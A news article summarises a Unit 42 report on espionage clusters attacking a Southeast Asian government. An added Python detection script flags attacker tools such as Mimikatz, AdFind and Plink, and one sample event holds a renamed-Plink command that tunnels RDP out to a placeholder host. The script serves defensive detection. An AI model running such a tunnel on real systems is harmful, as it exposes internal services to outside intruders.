
Chinese state actors believed to be responsible for espionage attacks on Southeast Asian government


In a recent blog post, cybersecurity company Unit 42 has identified multiple cyber espionage groups involved in various hacking activities. One of the groups, named Stately Taurus, is believed to be linked to China.

With a moderate-high level of confidence, Unit 42 has concluded that the activities conducted by Stately Taurus are associated with Chinese cyber espionage. The attribution is supported by the use of unique and rare tools like the ToneShell backdoor, which have not been publicly documented in connection with any other known threat actor. This revelation sheds light on the increasing sophistication and capabilities of Chinese hackers in their pursuit of intellectual property theft.

Another cluster of hacking incidents has been attributed, with a moderate level of confidence, to a group called Alloy Taurus. These incidents involved the deployment of numerous web shells by exploiting vulnerabilities in Exchange servers. A web shell is a malicious script placed on a compromised server that gives the attacker remote access to it, allowing them to control it from outside the network. This tactic highlights the continued relevance of old techniques like web shell attacks.

The cyber espionage activities conducted by these groups involved extensive reconnaissance on the targeted networks. To gather information, the hackers utilized a range of tools, including the Chinese open-source scanning framework LadonGo, the IP scanner NBTScan, the command-line tool AdFind, and Impacket. Additionally, they employed credential harvesting tools such as Hdump, Mimikatz, and DCSync to steal login information.

Once the initial infiltration was successful, the state-sponsored actors aimed to maintain a foothold in the compromised networks and establish persistence. They achieved this by installing various tools and malware. Notably, they used Cobalt Strike, a well-known penetration testing beacon, and the Quasar remote access Trojan (RAT). These tools allowed them to remotely access and control the compromised systems. Furthermore, they utilized SSH tunneling through command-line tools like PuTTY Link (Plink) and HTran to conceal their activities.
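
The tooling named in the two paragraphs above (LadonGo, NBTScan, AdFind, Mimikatz, Plink, HTran) is a natural input for endpoint detection. The following is an added example, not code from Unit 42 or from the article: it classifies constructed Sysmon-style process-creation events, flagging known tool names, a known tool running under a renamed image, and Plink invoked with SSH remote port forwarding. The sample events, the `OriginalFileName` values and the host name `REDACTED_HOST` are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Tool names taken from the report; compared against both the image
# basename and the PE version-info OriginalFileName (Sysmon Event ID 1).
KNOWN_TOOLS = {"ladongo", "nbtscan", "adfind", "mimikatz", "plink", "htran"}


@dataclass
class ProcessEvent:
    image: str          # full path of the executed binary
    original_name: str  # OriginalFileName from PE version info (may be empty)
    command_line: str


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower().removesuffix(".exe")


def classify(ev: ProcessEvent) -> list[str]:
    """Return detection labels for one process-creation event (empty if benign)."""
    labels = []
    img = _basename(ev.image)
    orig = ev.original_name.lower().removesuffix(".exe")
    if img in KNOWN_TOOLS or orig in KNOWN_TOOLS:
        labels.append("known_tool:" + (orig if orig in KNOWN_TOOLS else img))
    # A known tool whose on-disk name differs from its compiled name was renamed,
    # a common way of hiding Plink or Mimikatz under an innocuous file name.
    if orig in KNOWN_TOOLS and orig != img:
        labels.append("renamed_binary")
    # Plink "-R bind:port:host:port" publishes an internal service through an
    # outbound SSH session, i.e. the tunneling described in the report.
    cl = ev.command_line.lower()
    if orig == "plink" and re.search(r"(^|\s)-r\s+\S+:\d+:\S+:\d+", cl):
        labels.append("ssh_remote_forward")
    return labels


# Constructed sample events: a renamed Plink tunnel, AdFind, and benign Notepad.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\Temp\svchost.exe", "Plink",
                 "svchost.exe -ssh -N -R 0.0.0.0:2222:127.0.0.1:3389 REDACTED_HOST"),
    ProcessEvent(r"C:\Tools\AdFind.exe", "AdFind", "AdFind.exe -f objectcategory=computer"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "NOTEPAD.EXE", "notepad.exe"),
]


def run(events=SAMPLE_EVENTS) -> dict[str, list[str]]:
    """Map each image path to its detection labels."""
    return {ev.image: classify(ev) for ev in events}
```

In production the `OriginalFileName` field comes from Sysmon Event ID 1 or an EDR equivalent; the regex only fires for Plink, so HTran's own argument syntax would need a separate rule.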

In a separate discovery, Unit 42 identified a cluster of attacks attributed to a group known as Gelsemium. Unlike the previous two groups, Gelsemium is not linked to any specific state. However, their tactics and tools stand out due to their rarity and uniqueness. Unit 42 concluded with a moderate level of confidence that Gelsemium was responsible for a series of attacks on sensitive servers belonging to a government entity in Southeast Asia. The cluster featured a combination of rare malware, including the SessionManager IIS backdoor and OwlProxy, enabling the threat actor to gain unauthorized access and collect sensitive information.

These findings by Unit 42 highlight the evolving nature of cyber threats and the increasing complexity of cyber espionage campaigns. The attribution of these activities to specific groups, particularly those with state affiliations like Stately Taurus, underscores the need for robust cybersecurity measures to protect against intellectual property theft and other malicious activities. As attackers continue to advance their techniques and exploit vulnerabilities, it is vital for organizations and governments to remain vigilant and proactive in their defense against cyber threats.
